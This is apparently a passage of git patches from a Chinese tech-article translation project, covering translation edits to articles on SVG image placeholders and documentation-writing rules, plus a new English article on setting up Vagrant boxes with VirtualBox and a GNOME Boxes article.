的结果也可以用作背景图像。因为尺寸约束和矢量化,它们在图像和大规模的背景图像中是很好的选择。 +这些生成的 SVG 也可以用作背景图像。因为尺寸约束和矢量化,它们在展示超大题图hero image和大型背景图像时是很好的选择。 #### SQIP 用 [Tobias 自己的话说][41]: -> SQIP 是尝试在这两个极端之间找到一种平衡:它使用 [Primitive][42] 去生成一个由几种简单图像构成的近似图像的可见特征的 SVG,使用 [SVGO][43] 去优化 SVG,并且为它增加高斯模糊滤镜。产生的最终的 SVG 占位符加权后大小为 ~800–1000 字节,在屏幕上看起来更为平滑,并提供一个可视的图像内容提示。 +> SQIP 尝试在这两个极端之间找到一种平衡:它使用 [Primitive][42] 去生成一个 SVG,由几种简单的形状构成,近似于图像中可见的主要特征,使用 [SVGO][43] 优化 SVG,并且为它增加高斯模糊滤镜。产生的最终的 SVG 占位符后大小仅为约 800~1000 字节,在屏幕上看起来更为平滑,并提供一个图像内容的视觉提示。 -这个结果和使用一个极小的使用了模糊技术的占位符图像类似。(what [Medium][44] and [other sites][45] do)。区别在于它们使用了一个位图图像,如 JPG 或者 WebP,而这里是使用的占位符是 SVG。 +这个结果和使用一个用了模糊技术的极小占位符图像类似。(看看  [Medium][44] 和 [其它站点][45] 是怎么做的)。区别在于它们使用了一个位图图像,如 JPG 或者 WebP,而这里是使用的占位符是 SVG。 如果我们使用 SQIP 而不是原始图像,我们将得到这样的效果: - ![](https://cdn-images-1.medium.com/max/938/0*yUY1ZFP27vFYgj_o.png) +![](https://cdn-images-1.medium.com/max/938/0*DKoZP7DXFvUZJ34E.png) +*[第一张图像][11] 和 [第二张图像][12] 使用了 SQIP 后的输出图像。* - -![](https://cdn-images-1.medium.com/max/938/0*DKoZP7DXFvUZJ34E.png) -[第一张图片][11] 和 [第二张][12] 的输出图像使用了 SQIP。 - -输出的 SVG 是 ~900 字节,并且检查代码,我们可以发现 `feGaussianBlur` 过滤应用到形状组上: +输出的 SVG 约 900 字节,并且通过检查代码,我们可以发现 `feGaussianBlur` 过滤被应用到该组形状上: ``` ``` -SQIP 也可以输出一个 Base 64 编码的 SVG 内容的图像标签: +SQIP 也可以输出一个带有 Base64 编码的 SVG 内容的图像标签: ``` @@ -137,49 +125,40 @@ SQIP 也可以输出一个 Base 64 编码的 SVG 内容的图像标签: #### 轮廓 -我们刚才看了使用了边缘和 primitive 形状的 SVG。另外一种可能是去矢量化图像以 “tracing” 它们。[Mikael 动画][47] 分享的 [a codepen][48],在几天前展示了怎么去使用两色轮廓作为一个占位符。结果非常漂亮: +我们刚才看了使用了边缘和原始形状的 SVG。另外一种矢量化图像的方式是 “描绘” 它们。在几天前 [Mikael Ainalem][47] 分享了一个 [codepen][48] 代码,展示了怎么去使用两色轮廓作为一个占位符。结果非常漂亮: - ![](https://cdn-images-1.medium.com/max/1250/1*r6HbVnBkISCQp_UVKjOJKQ.gif) -SVGs 在这种情况下是手工绘制的,但是,这种技术可以用工具快速生成并自动化处理。 +SVG 在这种情况下是手工绘制的,但是,这种技术可以用工具快速生成并自动化处理。 -* [Gatsby][13],一个 React 支持的描绘 SVGs 的静态网站生成器。它使用 [一个 potrace 算法的 JS 端口][14] 去矢量化图像。 +* [Gatsby][13],一个用 React 支持的描绘 SVG 的静态网站生成器。它使用 [一个 potrace 算法的 JS 移植][14] 去矢量化图像。 +* [Craft 3 CMS][15],它也增加了对轮廓的支持。它使用了 [一个 potrace 算法的 PHP 移植][16]。 +* [image-trace-loader][17],一个使用了 potrace 算法去处理图像的 Webpack 加载器。 -* [Craft 3 CMS][15],它也增加了对轮廓的支持。它使用 [一个 potrace 算法的 PHP 端口][16]。 +如果感兴趣,可以去看一下 Emil 的 webpack 加载器 (基于 potrace) 和 Mikael 的手工绘制 SVG 之间的比较。 - -* [image-trace-loader][17],一个使用了 Potrace 算法去处理图像的 Webpack 加载器。 - - -如果感兴趣,可以去看一下 Emil 的 webpack 加载器 (基于 potrace) 和 Mikael 的手工绘制 SVGs 之间的比较。 - - -假设我使用一个默认选项的 potrace 生成输出。但是,有可能对它们进行调整。查看 [the options for image-trace-loader][49],它非常漂亮 [the ones passed down to potrace][50]。 +这里我假设该输出是使用默认选项的 potrace 生成的。但是可以对它们进行优化。查看 [图像描绘加载器的选项][49],[传递给 potrace 的选项][50]非常丰富。 ### 总结 -我们看到有不同的工具和技术去从图像中生成 SVGs,并且使用它们作为占位符。与 [WebP 是一个奇妙格式的缩略图][51] 方式相同,SVG 也是一个用于占位符的有趣的格式。我们可以控制细节的级别(和它们的大小),它是高可压缩的,并且很容易用 CSS 和 JS 进行处理。 +我们看到了从图像中生成 SVG 并使用它们作为占位符的各种不同的工具和技术。与 [WebP 是一个用于缩略图的奇妙格式][51] 一样,SVG 也是一个用于占位符的有趣格式。我们可以控制细节的级别(和它们的大小),它是高可压缩的,并且很容易用 CSS 和 JS 进行处理。 #### 额外的资源 -这篇文章发表于 [the top of Hacker News][52]。我非常感谢它,并且,在页面上的注释中的其它资源的全部有链接。下面是其中一部分。 - -* [Geometrize][18] 是用 Haxe 写的 Primitive 的一个端口。这个也是,[一个 JS 实现][19],你可以直接 [在你的浏览器上][20]尝试。 - -* [Primitive.js][21],它也是在 JS 中的一个 Primitive 端口,[primitive.nextgen][22],它是使用 Primitive.js 和 Electron 的 Primitive 的桌面版应用的一个端口。 +这篇文章上到了 [Hacker News 热文][52]。对此以及在该页面的评论中分享的其它资源的链接,我表示非常感谢。下面是其中一部分。 +* [Geometrize][18] 是用 Haxe 写的 Primitive 的一个移植。也有[一个 JS 实现][19],你可以直接 [在你的浏览器上][20]尝试它。 +* [Primitive.js][21],它也是 Primitive 在 JS 中的一个移植,[primitive.nextgen][22],它是使用 Primitive.js 和 Electron 的 Primitive 的桌面版应用的一个移植。 * 这里有两个 Twitter 帐户,里面你可以看到一些用 Primitive 和 Geometrize 生成的图像示例。访问 [@PrimitivePic][23] 和 [@Geometrizer][24]。 - -* [imagetracerjs][25],它是在 JavaScript 中的光栅图像跟踪和矢量化程序。这里也有为 [Java][26] 和 [Android][27] 提供的端口。 +* [imagetracerjs][25],它是在 JavaScript 中的光栅图像描绘器和矢量化程序。这里也有为 [Java][26] 和 [Android][27] 提供的移植。 -------------------------------------------------------------------------------- via: https://medium.freecodecamp.org/using-svg-as-placeholders-more-image-loading-techniques-bed1b810ab2c -作者:[ José M. Pérez][a] +作者:[José M. Pérez][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From cf3ef7fcfd34fb28df1079e47b00d1236b716e16 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 13 Dec 2017 23:37:36 +0800 Subject: [PATCH 0536/1627] PUB:20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md @qhwdw https://linux.cn/article-9142-1.html --- ...use SVG as a Placeholder and Other Image Loading Techniques.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md (100%) diff --git a/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/published/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md similarity index 100% rename from translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md rename to published/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md From 8faf0c1e05d140612441f2e6922cb533a872f4a4 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 00:42:10 +0800 Subject: [PATCH 0537/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171205 7 rules for avoiding documentation pitfalls.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171205 7 rules for avoiding documentation pitfalls.md (100%) diff --git a/sources/tech/20171205 7 rules for avoiding documentation pitfalls.md b/translated/tech/20171205 7 rules for avoiding documentation pitfalls.md similarity index 100% rename from sources/tech/20171205 7 rules for avoiding documentation pitfalls.md rename to translated/tech/20171205 7 rules for avoiding documentation pitfalls.md From 4149e7bce9e62cdf7435d63970f4e9e058d45bf4 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 00:42:17 +0800 Subject: [PATCH 0538/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2014=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=9B=9B=2000:42:1?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...les for avoiding documentation pitfalls.md | 122 +++++------------- 1 file changed, 29 insertions(+), 93 deletions(-) diff --git a/translated/tech/20171205 7 rules for avoiding documentation pitfalls.md b/translated/tech/20171205 7 rules for avoiding documentation pitfalls.md index 8d4b4407f0..596997b8cb 100644 --- a/translated/tech/20171205 7 rules for avoiding documentation pitfalls.md +++ b/translated/tech/20171205 7 rules for avoiding documentation pitfalls.md @@ -1,121 +1,57 @@ -translating by lujun9972 -7 rules for avoiding documentation pitfalls +防止文档陷阱的 7 条准则 ====== -English serves as _lingua franca_ in the open source community. To reduce -translation costs, many teams have switched to English as the source language -for their documentation. But surprisingly, writing in English for an -international audience does not necessarily put native English speakers in a -better position. On the contrary, they tend to forget that the document 's -language might not be the audience's first language. +英语是开源社区的通用语言。为了减少翻译成本,很多团队都改成用英语来写他们的文档。 但奇怪的是,为国际读者写英语并不一定就意味着英语为母语的人就占据更多的优势。 相反, 他们往往忘记了写文档用的语言可能并不是读者的母语。 -Let's have a look at the following simple sentence as an example: "Encrypt the -password using the `foo bar` command." Grammatically, the sentence is correct. -Given that '-ing' forms (gerunds) are frequently used in the English language -and most native speakers consider them an elegant way of expressing things, -native speakers usually do not hesitate to phrase a sentence like this. On -closer inspection, the sentence is ambiguous because "using" may refer either -to the object ("the password") or to the verb ("encrypt"). Thus, the sentence -can be interpreted in two different ways: +我们以下面这个简单的句子为例: "Encrypt the password using the `foo bar` command。" 语法上来说,这个句子是正确的。 鉴于动名词的 '-ing' 形式在英语中很常见,大多数的母语人士都认为这是一种优雅的表达方式, 他们通常会很自然的写出这样的句子。 但是仔细观察, 这个句子存在歧义因为 "using" 可能指的宾语 ("the password") 也可能指的动词 ("encrypt")。 因此这个句子有两种解读方式: - * "Encrypt the password that uses the `foo bar` command." - * "Encrypt the password by using the `foo bar` command." + * "加密使用了 `foo bar` 命令的密码。" + * "使用命令 `foo bar` 来加密密码。" -As long as you have previous knowledge about the topic (password encryption or -the `foo bar` command), you can resolve this ambiguity and correctly decide -that the second version is the intended meaning of this sentence. But what if -you lack in-depth knowledge of the topic? What if you are not an expert, but a -translator with only general knowledge of the subject? Or if you are a non- -native speaker of English, unfamiliar with advanced grammatical forms like -gerunds? +如果你有相关的先验知识 (密码加密或这 `foo bar` 命令),你可以消除这种不确定性并且明白第二种方式才是真正的意思。 但是若你没有足够深入的知识怎么办呢? 如果你并不是这方面的专家,而只是一个拥有泛泛相关知识的翻译者而已怎么办呢? 再或者,如果你只是个非母语人士且对像动名词这种高级语法不熟悉怎么办呢? -Even native English speakers need training to write clear and straightforward -technical documentation. The first step is to raise awareness about the -usability of texts and potential problems, so let's look at seven rules that -can help avoid common pitfalls. +即使是英语为母语的人也需要经过训练才能写出清晰直接的技术文档。训练的第一步就是提高对文本可用性以及潜在问题的警觉性, 下面让我们来看一下可以帮助避免常见陷阱的 7 条规则。 -### 1. Know your target audience and step into their shoes. +### 1。了解你的目标读者并代入其中。 -If you are a developer writing for end users, view the product from their -perspective. Does the structure reflect the users' goals? The [persona -technique][1] can help you to focus on the target audience and provide the -right level of detail for your readers. +如果你是一名开发者,而写作的对象是终端用户, 那么你需要站在他们的角度来看这个产品。 文档的结构是否反映了用户的目标? [人格面具 (persona) 技术][1] 能帮你专注于目标受众并为你的读者提供合适层次的细节。 -### 2. Follow the KISS principle--keep it short and simple. +### 2。准训 KISS 原则--保持文档简短而简单 -The principle can be applied on several levels, such as grammar, sentences, or -words. Here are examples: - - * Use the simplest tense that is appropriate. For example, use present tense when mentioning the result of an action: - * " ~~Click 'OK.' The 'Printer Options' dialog will appear.~~" -> "Click 'OK.' The 'Printer Options' dialog appears." - * As a rule of thumb, present one idea in one sentence; however, short sentences are not automatically easy to understand (especially if they are an accumulation of nouns). Sometimes, trimming down sentences to a certain word count can introduce ambiguities. In turn, this makes the sentences more difficult to understand. - * Uncommon and long words slow reading and might be obstacles for non-native speakers. Use simpler alternatives: +这个原则适用于多个层次,从语法,句子到单词。 比如: + * 使用合适的最简单时态。比如, 当提到一个动作的结果时使用现在时: + * " ~~Click 'OK。' The 'Printer Options' dialog will appear。~~" -> "Click 'OK。' The 'Printer Options' dialog appears。" + * 按经验来说,一个句子表达一个主题; 然而, 短句子并不一定就容易理解(尤其当这些句子都是由名词组成时)。 有时, 将句子裁剪过度可能会引起歧义,而反过来太多单词则又难以理解。 + * 不常用的以及很长的单词会降低阅读速度,而且可能成为非母语人士的障碍。 使用更简单的替代词语: * " ~~utilize~~ " -> "use" - * " ~~indicate~~ " -> "show," "tell," or "say" + * " ~~indicate~~ " -> "show," "tell," or "say" * " ~~prerequisite~~ " -> "requirement" -### 3. Avoid disturbing the reading flow. +### 3。不要干扰阅读流 -Move particles or longer parentheses to the beginning or end of a sentence: +将虚词和较长的插入语移到句子的首部或者尾部: - * " ~~They are not, however, marked as installed.~~ " -> "However, they are not marked as installed." + * " ~~They are not,however, marked as installed。~~ " -> "However, they are not marked as installed。" -Place long commands at the end of a sentence. This also results in better -segmentation of sentences for automatic or semi-automatic translations. +将长命令放在句子的末尾可以让自动/半自动的翻译拥有更好的断句。 -### 4. Discriminate between two basic information types. +### 4。区别对待两种基本的信息类型 -Discriminating between _descriptive information_ and _task-based information_ -is useful. Typical examples for descriptive information are command-line -references, whereas how-to 's are task-based information; however, both -information types are needed in technical writing. On closer inspection, many -texts contain a mixture of both information types. Clearly separating the -information types is helpful. For better orientation, label them accordingly. -Titles should reflect a section's content and information type. Use noun-based -titles for descriptive sections ("Types of Frobnicators") and verbally phrased -titles for task-based sections ("Installing Frobnicators"). This helps readers -quickly identify the sections they are interested in and allows them to skip -the ones they don't need at the moment. +描述型信息以及任务导向型信息有必要区分开来。描述型信息的一个典型例子就是命令行参考, 而 how-to 则是属于基于任务的信息; 然而, 技术写作中都会涉及这两种类型的信息。 仔细观察, 就会发现许多文本都同时包含了两种类型的信息。 然而如果能够清晰地划分这两种类型的信息那必是极好的。 为了跟好地区分他们,可以对他们进行分别标记(For better orientation, label them accordingly)。 标题应该能够反应章节的内容以及信息的类型。 对描述性章节使用基于名词的标题(比如"Types of Frobnicators"),而对基于任务的章节使用口头表达式的标题(例如"Installing Frobnicators")。 这可以让读者快速定位感兴趣的章节而跳过他无用的章节。 -### 5. Consider different reading situations and modes of text consumption. +### 5。考虑不同的阅读场景和阅读模式 -Some of your readers are already frustrated when they turn to the product -documentation because they could not achieve a certain goal on their own. They -might also work in a noisy environment that makes it hard to focus on reading. -Also, do not expect your audience to read cover to cover, as many people skim -or browse texts for keywords or look up topics by using tables, indexes, or -full-text search. With that in mind, look at your text from different -perspectives. Often, compromises are needed to find a text structure that -works well for multiple situations. +有些读者在转向阅读产品文档时会由于自己搞不定而感到十分的沮丧。他们也在一个嘈杂的环境中工作,很难专注于阅读。 同时,不要期望你的读者会一页一页的进行阅读,很多人都是快速浏览文本搜索关键字或者通过表格,索引以及全文搜索的方式来查找主题。 请牢记这一点, 从不同的角度来看待你的文字。 通常需要妥协才能找到一种适合多种情况的文本结构。 -### 6. Break down complex information into smaller chunks. +### 6。将复杂的信息分成小块。 -This makes it easier for the audience to remember and process the information. -For example, procedures should not exceed seven to 10 steps (according to -[Miller's Law][2] in cognitive psychology). If more steps are required, split -the task into separate procedures. +这会让读者更容易记住和吸收信息。例如, 过程不应该超过 7 到 10 个步骤(根据认知心理学中的 [Miller's Law][2])。 如果需要更多的步骤, 那么就将任务分拆成不同的过程。 -### 7. Form follows function. +### 7。形式遵循功能 -Examine your text according to the question: What is the _purpose_ (function) -of a certain sentence, a paragraph, or a section? For example, is it an -instruction? A result? A warning? For instructions, use active voice: -"Configure the system." Passive voice may be appropriate for descriptions: -"The system is configured automatically." Add warnings _before_ the step or -action where danger arises. Focusing on the purpose also helps detect -redundant content to help eliminate fillers like "basically" or "easily," -unnecessary modifications like " ~~already~~ existing " or " ~~completely~~ -new, " or any content that is not relevant for your target audience. +根据以下问题检查你的文字: 某句话/段落/章节的 _目的_ (功能)是什么?比如, 它是一个指令呢?还是一个结果呢?还是一个警告呢?如果是指令, 使用主动语气: "Configure the system。" 被动语气可能适合于进行描述: "The system is configured automatically。" 将警告放在危险操作的 _前面_ 。 专注于目的还有助于发现冗余的内容,可以清除类似 "basically" 或者 "easily" 这一类的填充词,类似 " ~~already~~ existing " or " ~~completely~~ new" 这一类的不必要的修改, 以及任何与你的目标大众无关的内容。 -As you might have guessed by now, writing is re-writing. Good writing requires -effort and practice. Even if you write only occasionally, you can -significantly improve your texts by focusing on the target audience and -following the rules above. The better the readability of a text, the easier it -is to process, even for audiences with varying language skills. Especially -when it comes to localization, good quality of the source text is important: -"Garbage in, garbage out." If the original text has deficiencies, translating -the text takes longer, resulting in higher costs. In the worst case, flaws are -multiplied during translation and must be corrected in various languages. +你现在可能已经猜到了,写作就是一个不断重写的过程。 好的写作需要付出努力和练习。 即使你只是偶尔写点东西, 你也可以通过关注目标大众并遵循上述规则来显著地改善你的文字。 文字的可读性越好, 理解就越容易, 这一点对不同语言能力的读者来说都是适合的。 尤其是当进行本地化时, 高质量的原始文本至关重要: "垃圾进, 垃圾出"。 如果原始文本就有缺陷, 翻译所需要的时间就会变长, 从而导致更高的成本。 最坏的情况下, 翻译会导致缺陷成倍增加,需要在不同的语言版本中修正这个缺陷。 -------------------------------------------------------------------------------- From 3921f623705f8b0ec89b714126a01324eca06516 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 00:50:59 +0800 Subject: [PATCH 0539/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Complete=20guid?= =?UTF-8?q?e=20for=20creating=20Vagrant=20boxes=20with=20VirtualBox?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... creating Vagrant boxes with VirtualBox.md | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md diff --git a/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md b/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md new file mode 100644 index 0000000000..a91f8b25a8 --- /dev/null +++ b/sources/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md @@ -0,0 +1,129 @@ +translating by lujun9972 +Complete guide for creating Vagrant boxes with VirtualBox +====== +Vagrant is tool for building & managing virtual machines environment, especially development environments. It provides easy to use & easy to replicate/reproducible environment built on top of technologies like Docker, VirtualBox, Hyper-V, Vmware , AWS etc. + +Vagrant Boxes simplifies software configuration part & completely resolves the 'it works on my machine' problem that is usually faced in software development projects. Vagrant, thus increases the development productivity. + +In this tutorial, we will learn to setup Vagrant Boxes on our Linux machines using the VirtualBox. + +### Pre-requisites + +-Vagrant runs on top of a virtualization environment, & we will be using VritualBox for that. We already have a detailed article on "[ **Installing VirtualBox on Linux**][1]", read the article to setup VirtualBox on system. + +Once VirtualBox has been installed, we can move forward with Vagrant setup process. + + **(Recommended Read :[Create your first Docker Container ][2])** + +### Installation + +Once the VirtualBox is up & running on the machine, we will install the latest vagrant package. At the time of writing this tutorial, the latest version of Vagrant is 2.0.0. So download the latest rpm for vagrant using, + + **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.rpm** + +& install the package using , + + **$ sudo yum install vagrant_2.0.0_x86_64.rpm** + +If using Ubuntu, download the latest vagrant package using the following command, + + **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.deb** + +& install it, + + **$ sudo dpkg -i vagrant_2.0.0_x86_64.deb** + +Once the installation is complete, we will move on to configuration part. + +### Configuration + +Firstly we need to create a folder where vagrant will install the OS we need, to create a folder + + **$ mkdir /home/dan** + + **$ cd /home/dan/vagrant** + + **Note:-** Its always preferable to create vagrant on your home directory as you might face permissions issue with a local user. + +Now to install the Operating system like CentOS, execute the following command, + + **$ sudo vagrant init centos/7** + +or for installing Ubuntu, run + + **$ sudo vagrant init ubuntu/trusty64** + +![vagrant boxes][3] + +![vagrant boxes][4] + +This will also create a configuration file in the directory created for keeping the vagrant OS, called 'Vagrantfile'. It contains information like OS, Private IP network, Forwarded Port, hostname etc. If we need to build a new operating system, we can also edit the file. + +Once we have created/modified the operating system with vagrant, we can start it up by running the following command, + + **$ sudo vagrant up** + +This might take some time as it operating system is being built with this command & its downloading the required files from Internet. So depending on the Internet speed, this process can take some time. + +![vagrant boxes][5] + +![vagrant boxes][6] + +Once the process completes, you than manage the vagrant instances using the following command, + +Start the vagrant server + + **$ sudo vagrant up** + +Stop the server + + **$ sudo vagrant halt** + +Or to completely remove the server + + **$ sudo vagrant destroy** + +To access the server using ssh, + + **$ sudo vagrant ssh** + +you will get the ssh details while the Vagrant Box is being setup (refer to screenshot above). + +To see the vagrant OS that has been built, you can open the virtual box & you will find it among the Virtual machines created in the VirtualBox. If you are not seeing your machines in VirtualBox, open virtualbox with sudo permissions & Vagrant Boxes should be there. + +![vagrant boxes][7] + +![vagrant boxes][8] + + **Note:-** There are pre-configured Vagrant OS created & can downloaded from the Official Vagrant Website. () + +This completes our tutorial on how to setup a vagrant machine on our CentOS and Ubuntu machines. Please leave any queries you have in the comment box below & we will surely address them. + +If you think we have helped you or just want to support us, please consider these :- + +Connect to us: [Facebook][9] | [Twitter][10] | [Google Plus][11] + +Linux TechLab is thankful for your continued support. + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/creating-vagrant-virtual-boxes-virtualbox/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/installing-virtualbox-on-linux-centos-ubuntu/ +[2]:http://linuxtechlab.com/create-first-docker-container-beginners-guide/ +[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=721%2C87 +[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-1.png?resize=721%2C87 +[5]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=980%2C414 +[6]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-2-e1510557565780.png?resize=980%2C414 +[7]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=769%2C582 +[8]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/vagrant-3.png?resize=769%2C582 +[9]:https://www.facebook.com/linuxtechlab/ +[10]:https://twitter.com/LinuxTechLab +[11]:https://plus.google.com/+linuxtechlab From 7b20d3db1846170749314a8b21fabc6e73a4b250 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 14 Dec 2017 09:03:20 +0800 Subject: [PATCH 0540/1627] translated --- ...s It Easier to Test Drive Linux Distros.md | 47 ------------------- ...s It Easier to Test Drive Linux Distros.md | 45 ++++++++++++++++++ 2 files changed, 45 insertions(+), 47 deletions(-) delete mode 100644 sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md create mode 100644 translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md diff --git a/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md b/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md deleted file mode 100644 index 2564f94ded..0000000000 --- a/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md +++ /dev/null @@ -1,47 +0,0 @@ -translating---geekpi - -# GNOME Boxes Makes It Easier to Test Drive Linux Distros - -![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg) - -Creating Linux virtual machines on the GNOME desktop is about to get a whole lot easier. - -The next major release of  [_GNOME Boxes_][5]  is able to download popular Linux (and BSD-based) operating systems directly inside the app itself. - -Boxes is free, open-source software. It can be used to access both remote and virtual systems as it is built around [QEMU][6], KVM, and libvirt virtualisation technologies. - -For its new ISO-toting integration  _Boxes_  makes use of [libosinfo][7], a database of operating systems that also provides details on any virtualized environment requirements. - -In [this (mis-titled) video][8] from GNOME developer Felipe Borges you can see just how easy the improved ‘Source Selection’ screen makes things, including the ability to download a specific ISO architecture for a given distro: - -[video](https://youtu.be/CGahI05Gbac) - -Despite it being a core GNOME app I have to confess that I have never used Boxes. It’s not that I don’t hear good things about it (I do) it’s just that I’m more familiar with setting up and configuring virtual machines in VirtualBox. - -> ‘The lazy geek inside me is going to appreciate this integration’ - -Admitted it’s not exactly  _difficult_  to head out and download an ISO using the browser, then point a virtual machine app to it (heck, it’s what most of us have been doing for a decade or so). - -But the lazy geek inside me is really going to appreciate this integration. - -So, thanks to this feature I’ll be unpacking Boxes on my system when GNOME 3.28 is released next March. I will be able to launch  _Boxes_ , close my eyes,pick a distro from the list at random, and instantly broaden my Tux-shaped horizons. - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly - -作者:[ JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/dev -[3]:http://www.omgubuntu.co.uk/category/video -[4]:http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly -[5]:https://en.wikipedia.org/wiki/GNOME_Boxes -[6]:https://en.wikipedia.org/wiki/QEMU -[7]:https://libosinfo.org/ -[8]:https://blogs.gnome.org/felipeborges/boxes-downloadable-oses/ diff --git a/translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md b/translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md new file mode 100644 index 0000000000..b32d1a3943 --- /dev/null +++ b/translated/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md @@ -0,0 +1,45 @@ +# GNOME Boxes 使得测试 Linux 发行版更加简单 + +![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg) + +在 GNOME 桌面上创建 Linux 虚拟机即将变得更加简单。 + +[_GNOME Boxes_][5] 的下一个主要版本能够直接在应用程序内下载流行的 Linux(和基于 BSD 的)操作系统。 + +Boxes 是免费的开源软件。它可以用来访问远程和虚拟系统,因为它是用 [QEMU][6]、KVM 和 libvirt 虚拟化技术构建的。 + +对于新的 ISO-toting 的集成,_Boxes_ 利用 [libosinfo][7] 这一操作系统的数据库,该数据库还提供了有关任何虚拟化环境要求的详细信息。 + +在 GNOME 开发者 Felipe Borges 的[这个(起错标题)视频] [8]中,你可以看到改进的“源选择”页面,包括为给定的发行版下载特定 ISO 架构的能力: + +[video](https://youtu.be/CGahI05Gbac) + +尽管它是一个核心 GNOME 程序,我不得不承认,我从来没有使用过 Boxes。(我这么做)并不是说我没有听到有关它的好处,只是我更熟悉在 VirtualBox 中设置和配置虚拟机。 + +> “我内心的偷懒精神会欣赏这个集成” + +我承认在浏览器中下载一个 ISO 然后将虚拟机指向它(见鬼,这是我们大多数在过去十年来一直做的事)并不是一件很_困难_的事。 + +但是我内心的偷懒精神会欣赏这个集成。 + +所以,感谢这个功能,我将在明年 3 月份发布 GNOME 3.28 时,在我的系统上解压 Boxes。我会启动 _Boxes_,闭上眼睛,随意从列表中挑选一个发行版,并立即拓宽我的视野。 + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly + +作者:[ JOEY SNEDDON ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/dev +[3]:http://www.omgubuntu.co.uk/category/video +[4]:http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly +[5]:https://en.wikipedia.org/wiki/GNOME_Boxes +[6]:https://en.wikipedia.org/wiki/QEMU +[7]:https://libosinfo.org/ +[8]:https://blogs.gnome.org/felipeborges/boxes-downloadable-oses/ From 195b697783d3adf7f337e324d2919c2c4ca9fd18 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 14 Dec 2017 09:24:12 +0800 Subject: [PATCH 